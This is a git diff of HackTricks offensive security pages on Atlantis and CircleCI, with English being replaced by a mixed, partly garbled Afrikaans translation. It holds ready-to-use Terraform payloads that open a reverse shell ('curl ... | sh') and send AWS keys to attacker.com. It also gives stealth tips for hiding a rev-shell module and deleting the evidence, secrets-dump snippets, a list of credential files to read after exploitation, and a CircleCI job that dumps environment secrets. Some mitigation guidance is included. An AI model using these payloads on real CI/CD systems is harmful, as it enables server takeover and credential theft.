[**na**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) 'n **workflow uitgevoer word.** -There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file. +Daar is geen opsie om **te spesifiseer** hierdie scripts in die **repo `/atlantis.yml`** lĂȘer nie. 
**Workflow** -In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\ -Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.** +In die repo konfigurasie (bediener kant konfigurasie) kan jy [**'n nuwe standaard workflow spesifiseer**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), of [**nuwe persoonlike workflows skep**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** Jy kan ook **spesifiseer** watter **repos** toegang kan hĂȘ tot die **nuwe** wat gegenereer is.\ +Dan kan jy die **atlantis.yaml** lĂȘer van elke repo toelaat om **die workflow te spesifiseer wat gebruik moet word.** > [!CAUTION] -> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\ -> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> As die [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) vlag `allow_custom_workflows` op **Waar** gestel is, kan workflows in die **`atlantis.yaml`** lĂȘer van elke repo **gespesifiseer** word. 
Dit is ook potensieel nodig dat **`allowed_overrides`** ook **`workflow`** spesifiseer om die workflow wat gebruik gaan word te **oor te skryf**.\ +> Dit sal basies **RCE in die Atlantis bediener aan enige gebruiker wat toegang tot daardie repo kan kry, gee**. > > ```yaml > # atlantis.yaml @@ -126,19 +126,18 @@ Then, you can allow the **atlantis.yaml** file of each repo to **specify the wor **Conftest Policy Checking** -Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include: +Atlantis ondersteun die uitvoering van **server-side** [**conftest**](https://www.conftest.dev/) **beleide** teen die plan uitvoer. Algemene gebruiksgevalle vir die gebruik van hierdie stap sluit in: -- Denying usage of a list of modules -- Asserting attributes of a resource at creation time -- Catching unintentional resource deletions -- Preventing security risks (ie. exposing secure ports to the public) +- Ontkenning van die gebruik van 'n lys van modules. +- Bevestiging van eienskappe van 'n hulpbron tydens die skepping. +- Vang onbedoelde hulpbron verwyderings. +- Voorkoming van sekuriteitsrisiko's (bv. blootstelling van veilige poorte aan die publiek). -You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). +Jy kan kyk hoe om dit te konfigureer in [**die docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). ### Atlantis Commands -[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis: - +[**In die docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) kan jy die opsies vind wat jy kan gebruik om Atlantis te laat loop: ```bash # Get help atlantis help 
@@ -161,94 +160,82 @@ atlantis apply [options] -- [terraform apply flags] ## --verbose ## You can also add extra terraform options ``` - -### Attacks +### Aanvalle > [!WARNING] -> If during the exploitation you find this **error**: `Error: Error acquiring the state lock` - -You can fix it by running: +> As jy tydens die ontginning hierdie **fout** vind: `Error: Error acquiring the state lock` +Jy kan dit regmaak deur te loop: ``` atlantis unlock #You might need to run this in a different PR atlantis plan -- -lock=false ``` +#### Atlantis plan RCE - Konfigurasie wysiging in nuwe PR -#### Atlantis plan RCE - Config modification in new PR - -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**. - -You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file: +As jy skrywe toegang oor 'n repository het, sal jy in staat wees om 'n nuwe tak daarop te skep en 'n PR te genereer. As jy **`atlantis plan`** kan **uitvoer** (of miskien word dit outomaties uitgevoer), **sal jy in staat wees om RCE binne die Atlantis bediener te hĂȘ**. +Jy kan dit doen deur [**Atlantis 'n eksterne databron te laat laai**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). 
Sit net 'n payload soos die volgende in die `main.tf`-lĂȘer: ```json data "external" "example" { - program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] +program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] } ``` - -**Stealthier Attack** +**Stealthier Aanval** You can perform this attack even in a **stealthier way**, by following this suggestions: - Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: - ```javascript module "not_rev_shell" { - source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" +source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" } ``` - You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) -- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` -- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. +- In die eksterne hulpbron, gebruik die **ref** kenmerk om die **terraform rev shell code in 'n tak** binne die repo te verberg, iets soos: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- **In plaas daarvan** om 'n **PR na master** te skep om Atlantis te aktiveer, **skep 2 takke** (test1 en test2) en skep 'n **PR van een na die ander**. Wanneer jy die aanval voltooi het, verwyder eenvoudig die **PR en die takke**. 
#### Atlantis plan Secrets Dump You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file: - ```json output "dotoken" { - value = nonsensitive(var.do_token) +value = nonsensitive(var.do_token) } ``` +#### Atlantis apply RCE - Konfigurasie wysiging in nuwe PR -#### Atlantis apply RCE - Config modification in new PR +As jy skrywe toegang oor 'n repository het, sal jy in staat wees om 'n nuwe tak daarop te skep en 'n PR te genereer. As jy **`atlantis apply` kan uitvoer, sal jy in staat wees om RCE binne die Atlantis bediener te hĂȘ**. -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**. +Jy sal egter gewoonlik sommige beskermings moet omseil: -However, you will usually need to bypass some protections: - -- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). 
- - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) -- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` - - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) - -Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -You just need to make sure some payload like the following ones ends in the `main.tf` file: +- **Mergeable**: As hierdie beskerming in Atlantis gestel is, kan jy slegs **`atlantis apply` uitvoer as die PR mergeable is** (wat beteken dat die tak beskerming omseil moet word). +- Kontroleer potensiĂ«le [**tak beskerming omseilings**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +- **Goedgekeurd**: As hierdie beskerming in Atlantis gestel is, moet 'n **ander gebruiker die PR goedkeur** voordat jy `atlantis apply` kan uitvoer. 
+- Standaard kan jy die [**Gitbot token misbruik om hierdie beskerming om te seil**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +Voer **`terraform apply` uit op 'n kwaadwillige Terraform-lĂȘer met** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ +Jy moet net seker maak dat 'n payload soos die volgende in die `main.tf` lĂȘer eindig: ```json // Payload 1 to just steal a secret resource "null_resource" "secret_stealer" { - provisioner "local-exec" { - command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" - } +provisioner "local-exec" { +command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" +} } // Payload 2 to get a rev shell resource "null_resource" "rev_shell" { - provisioner "local-exec" { - command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" - } +provisioner "local-exec" { +command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" +} } ``` - -Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**. +Volg die **voorstelle van die vorige tegniek** om hierdie aanval op 'n **stealthier manier** uit te voer. #### Terraform Param Injection -When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like: - +Wanneer jy `atlantis plan` of `atlantis apply` uitvoer, word terraform onder-needs uitgevoer, jy kan opdragte aan terraform deur atlantis deur iets soos te kommentaar: ```bash atlantis plan -- atlantis plan -- -h #Get terraform plan help 
@@ -256,7 +243,6 @@ atlantis plan -- -h #Get terraform plan help atlantis apply -- atlantis apply -- -h #Get terraform apply help ``` - Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) #### Custom Workflow @@ -265,7 +251,7 @@ Running **malicious custom build commands** specified in an `atlantis.yaml` file This possibility was mentioned in a previous section: > [!CAUTION] -> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used. +> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **gespesifiseer** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **oorheers die werkvloei** that is going to be used. > > This will basically give **RCE in the Atlantis server to any user that can access that repo**. 
> @@ -288,97 +274,95 @@ This possibility was mentioned in a previous section: #### Bypass plan/apply protections -If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**. - +If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _het_ `apply_requirements` configured, it's possible for a repo to **wysig die plan/apply beskerming om dit te omseil**. ```yaml repos: - - id: /.*/ - apply_requirements: [] +- id: /.*/ +apply_requirements: [] ``` - #### PR Hijacking -If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to. +As iemand **`atlantis plan/apply` kommentaar op jou geldige pull requests stuur,** sal dit veroorsaak dat terraform loop wanneer jy nie wil hĂȘ dit moet nie. -Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE. +Boonop, as jy nie in die **branch protection** gekonfigureer het om te vra om elke PR te **herwaardeer** wanneer 'n **nuwe commit gestuur** word nie, kan iemand **kwaadwillige konfigurasies skryf** (kyk vorige scenario's) in die terraform konfigurasie, `atlantis plan/apply` uitvoer en RCE verkry. -This is the **setting** in Github branch protections: +Dit is die **instelling** in Github branch protections: ![](<../images/image (216).png>) #### Webhook Secret -If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly. 
+As jy daarin slaag om die **webhook secret** te **steel** of as daar **geen webhook secret** gebruik word nie, kan jy die **Atlantis webhook** aanroep en **atlatis opdragte** direk aanroep. #### Bitbucket -Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. +Bitbucket Cloud ondersteun **nie webhook secrets** nie. Dit kan aanvallers toelaat om **versoekte van Bitbucket te spoof**. Verseker dat jy slegs Bitbucket IP's toelaat. -- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. -- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. -- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). +- Dit beteken dat 'n **aanvaller** **valse versoeke aan Atlantis** kan maak wat lyk asof dit van Bitbucket kom. +- As jy `--repo-allowlist` spesifiseer, kan hulle slegs valse versoeke rakende daardie repos maak, so die meeste skade wat hulle kan aanrig, sal wees om te plan/apply op jou eie repos. +- Om dit te voorkom, toelaat [Bitbucket se IP adresse](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (kyk Uitgaande IPv4 adresse). 
### Post-Exploitation -If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: +As jy daarin geslaag het om toegang tot die bediener te verkry of ten minste jy het 'n LFI, is daar 'n paar interessante dinge wat jy moet probeer lees: -- `/home/atlantis/.git-credentials` Contains vcs access credentials -- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info -- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file - - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate -- `/proc/1/environ` Env variables -- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) +- `/home/atlantis/.git-credentials` Bevat vcs toegang akkrediteer +- `/atlantis-data/atlantis.db` Bevat vcs toegang akkrediteer met meer inligting +- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform staat lĂȘer +- Voorbeeld: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate +- `/proc/1/environ` Omgewings veranderlikes +- `/proc/[2-20]/cmdline` Cmd lyn van `atlantis server` (kan sensitiewe data bevat) ### Mitigations -#### Don't Use On Public Repos +#### Moet nie op Publieke Repos Gebruik nie -Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings. +Omdat enigiemand kommentaar op publieke pull requests kan lewer, selfs met al die sekuriteitsmitigaties beskikbaar, is dit steeds gevaarlik om Atlantis op publieke repos te laat loop sonder behoorlike konfigurasie van die sekuriteitsinstellings. 
-#### Don't Use `--allow-fork-prs` +#### Moet nie `--allow-fork-prs` Gebruik nie -If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo. +As jy op 'n publieke repo (wat nie aanbeveel word nie, kyk bo) loop, moet jy nie `--allow-fork-prs` stel nie (standaard is vals) omdat enigiemand 'n pull request van hul fork na jou repo kan oopmaak. #### `--repo-allowlist` -Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: +Atlantis vereis dat jy 'n allowlist van repositories spesifiseer waarvan dit webhooks sal aanvaar via die `--repo-allowlist` vlag. Byvoorbeeld: -- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` -- Your whole organization: `--repo-allowlist=github.com/runatlantis/*` -- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` -- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. +- Spesifieke repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` +- Jou hele organisasie: `--repo-allowlist=github.com/runatlantis/*` +- Elke repository in jou GitHub Enterprise installasie: `--repo-allowlist=github.yourcompany.com/*` +- Alle repositories: `--repo-allowlist=*`. Nuttig wanneer jy in 'n beskermde netwerk is, maar gevaarlik sonder om ook 'n webhook secret in te stel. -This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. +Hierdie vlag verseker dat jou Atlantis installasie nie gebruik word met repositories wat jy nie beheer nie. Kyk na `atlantis server --help` vir meer besonderhede. 
-#### Protect Terraform Planning +#### Beskerm Terraform Beplanning -If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials. +As aanvallers pull requests met kwaadwillige Terraform kode indien in jou bedreigingsmodel, moet jy bewus wees dat `terraform apply` goedkeuringe nie genoeg is nie. Dit is moontlik om kwaadwillige kode in 'n `terraform plan` te loop deur die [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) of deur 'n kwaadwillige verskaffer te spesifiseer. Hierdie kode kan dan jou akkrediteer uitvreet. -To prevent this, you could: +Om dit te voorkom, kan jy: -1. Bake providers into the Atlantis image or host and deny egress in production. -2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry. -3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here. +1. Verskaffers in die Atlantis beeld bak of gasheer en egress in produksie ontken. +2. Die verskaffer registrasie protokol intern implementeer en publieke egress ontken, sodat jy beheer wie skrywe toegang tot die registrasie het. +3. 
Jou [server-side repo konfigurasie](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` stap wysig om te valideer teen die gebruik van verbode verskaffers of data bronne of PR's van nie toegelate gebruikers. Jy kan ook ekstra validasie by hierdie punt voeg, bv. vereis 'n "duim-op" op die PR voordat jy die `plan` toelaat om voort te gaan. Conftest kan hier nuttig wees. #### Webhook Secrets -Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). +Atlantis moet met Webhook secrets gedraai word wat via die `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` omgewingsveranderlikes ingestel is. Selfs met die `--repo-allowlist` vlag ingestel, kan aanvallers versoeke aan Atlantis maak wat as 'n repository wat toegelaat is, voorgee. Webhook secrets verseker dat die webhook versoeke werklik van jou VCS verskaffer (GitHub of GitLab) kom. -If you are using Azure DevOps, instead of webhook secrets add a basic username and password. +As jy Azure DevOps gebruik, voeg in plaas van webhook secrets 'n basiese gebruikersnaam en wagwoord by. -#### Azure DevOps Basic Authentication +#### Azure DevOps Basiese Verifikasie -Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location. +Azure DevOps ondersteun die stuur van 'n basiese verifikasie kop in alle webhook gebeurtenisse. Dit vereis die gebruik van 'n HTTPS URL vir jou webhook ligging. #### SSL/HTTPS -If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. 
Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags. +As jy webhook secrets gebruik, maar jou verkeer is oor HTTP, kan die webhook secrets gesteel word. Aktiveer SSL/HTTPS met die `--ssl-cert-file` en `--ssl-key-file` vlag. -#### Enable Authentication on Atlantis Web Server +#### Aktiveer Verifikasie op Atlantis Webbediener -It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags. +Dit word baie aanbeveel om verifikasie in die webdiens te aktiveer. Aktiveer BasicAuth met die `--web-basic-auth=true` en stel 'n gebruikersnaam en 'n wagwoord op met die `--web-username=yourUsername` en `--web-password=yourPassword` vlag. -You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`. +Jy kan ook hierdie as omgewingsveranderlikes deurgee `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` en `ATLANTIS_WEB_PASSWORD=yourPassword`. ### References @@ -386,7 +370,3 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` - [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md index 8b8a1fea1..2347a087f 100644 --- a/src/pentesting-ci-cd/circleci-security.md +++ b/src/pentesting-ci-cd/circleci-security.md 
@@ -1,259 +1,235 @@ -# CircleCI Security +# CircleCI Veiligheid {{#include ../banners/hacktricks-training.md}} -### Basic Information +### Basiese Inligting -[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. +[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is 'n KontinuĂŻteitsintegrasie-platform waar jy **sjablone** kan **definieer** wat jy wil hĂȘ dit moet met 'n paar kode doen en wanneer om dit te doen. Op hierdie manier kan jy **toetsing** of **ontplooiings** direk **van jou repo hooftak** byvoorbeeld **outomatiseer**. -### Permissions +### Toestemmings -**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\ -In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...). +**CircleCI** **erf die toestemmings** van github en bitbucket wat verband hou met die **rekening** wat aanmeld.\ +In my toetse het ek gekontroleer dat solank jy **skryftoestemmings oor die repo in github** het, jy in staat gaan wees om **sy projekinstellings in CircleCI te bestuur** (nuwe ssh sleutels op te stel, projek api sleutels te kry, nuwe takke met nuwe CircleCI konfigurasies te skep...). -However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**. +Jy moet egter 'n **repo admin** wees om die **repo in 'n CircleCI projek te omskep**. 
-### Env Variables & Secrets +### Omgewing Veranderlikes & Geheime -According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow. +Volgens [**die dokumentasie**](https://circleci.com/docs/2.0/env-vars/) is daar verskillende maniere om **waardes in omgewing veranderlikes** binne 'n werksvloei te **laai**. -#### Built-in env variables +#### Ingeboude omgewing veranderlikes -Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. +Elke houer wat deur CircleCI gedraai word, sal altyd [**spesifieke omgewing veranderlikes in die dokumentasie gedefinieer**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) hĂȘ soos `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` of `CIRCLE_USERNAME`. -#### Clear text - -You can declare them in clear text inside a **command**: +#### Duidelike teks +Jy kan hulle in duidelike teks binne 'n **opdrag** verklaar: ```yaml - run: - name: "set and echo" - command: | - SECRET="A secret" - echo $SECRET +name: "set and echo" +command: | +SECRET="A secret" +echo $SECRET ``` - -You can declare them in clear text inside the **run environment**: - +U kan hulle in duidelike teks binne die **run environment** verklaar: ```yaml - run: - name: "set and echo" - command: echo $SECRET - environment: - SECRET: A secret +name: "set and echo" +command: echo $SECRET +environment: +SECRET: A secret ``` - -You can declare them in clear text inside the **build-job environment**: - +U kan hulle in duidelike teks binne die **build-job omgewing** verklaar: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret +build-job: +docker: +- image: cimg/base:2020.01 +environment: +SECRET: A secret ``` - -You can declare them in 
clear text inside the **environment of a container**: - +U kan dit in duidelike teks binne die **omgewing van 'n houer** verklaar: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret +build-job: +docker: +- image: cimg/base:2020.01 +environment: +SECRET: A secret ``` +#### Projek Geheime -#### Project Secrets - -These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ -You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ +Dit is **geheime** wat slegs deur die **projek** (deur **enige tak**) **toeganklik** gaan wees.\ +Jy kan hulle **verklaar in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ ![](<../images/image (129).png>) > [!CAUTION] -> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. +> Die "**Import Variabels**" funksionaliteit laat toe om **variabels van ander projekte** na hierdie een te **importeer**. -#### Context Secrets +#### Konteks Geheime -These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: +Dit is geheime wat **organisasie wye** is. Deur **verstek kan enige repo** **enige geheim** wat hier gestoor is **toegang** hĂȘ: ![](<../images/image (123).png>) > [!TIP] -> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ -> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. 
+> Let egter daarop dat 'n ander groep (in plaas van Alle lede) kan wees **geselekteer om slegs toegang tot die geheime aan spesifieke mense** te gee.\ +> Dit is tans een van die beste maniere om die **veiligheid van die geheime** te **verhoog**, om nie te laat dat almal toegang het nie, maar net sommige mense. -### Attacks +### Aanvalle -#### Search Clear Text Secrets +#### Soek Duidelike Teks Geheime -If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there. +As jy **toegang het tot die VCS** (soos github) kyk na die lĂȘer `.circleci/config.yml` van **elke repo op elke tak** en **soek** na potensiĂ«le **duidelike teks geheime** wat daar gestoor is. -#### Secret Env Vars & Context enumeration +#### Geheime Omgewing Variabelen & Konteks enumerasie -Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. +Deur die kode na te gaan kan jy **alle geheime name** vind wat in elke `.circleci/config.yml` lĂȘer **gebruik** word. Jy kan ook die **konteks name** van daardie lĂȘers kry of hulle in die webkonsol nagaan: _https://app.circleci.com/settings/organization/github/\/contexts_. -#### Exfiltrate Project secrets +#### Ekstrakteer Projek geheime > [!WARNING] -> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). 
+> Ten einde om **ALLES** van die projek en konteks **GEHEIME** te **ekstrakteer** moet jy **net** **SKRYF** toegang hĂȘ tot **net 1 repo** in die hele github organisasie (_en jou rekening moet toegang hĂȘ tot die kontekste, maar deur verstek kan almal toegang hĂȘ tot elke konteks_). > [!CAUTION] -> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. - -All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: +> Die "**Import Variabels**" funksionaliteit laat toe om **variabels van ander projekte** na hierdie een te **importeer**. Daarom kan 'n aanvaller **alle projekvariabels van al die repos** **importeer** en dan **almal saam ekstrakteer**. +Alle projek geheime is altyd in die omgewing van die werksgeleenthede ingestel, so net deur om omgewing aan te roep en dit in base64 te obfuskeer, sal die geheime in die **werkvloei weblogkonsol** geĂ«kstrakteer word: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "env | base64" workflows: - exfil-env-workflow: - jobs: - - exfil-env +exfil-env-workflow: +jobs: +- exfil-env ``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - +As jy **nie toegang tot die webkonsol** het nie, maar jy het **toegang tot die repo** en jy weet dat CircleCI gebruik word, kan jy net **n werkvloei skep** wat **elke minuut geaktiveer word** en 
